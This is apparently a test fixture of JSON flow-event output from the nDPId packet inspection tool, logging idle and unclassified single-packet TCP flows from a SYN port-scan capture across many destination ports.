+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2005,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1822,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2008,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061256,"flow_last_seen":1278275061256,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2008,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1004,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6112,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060558,"flow_last_seen":1278275060558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060558,"flow_last_seen":1278275060558,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2020,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10215,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10215,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
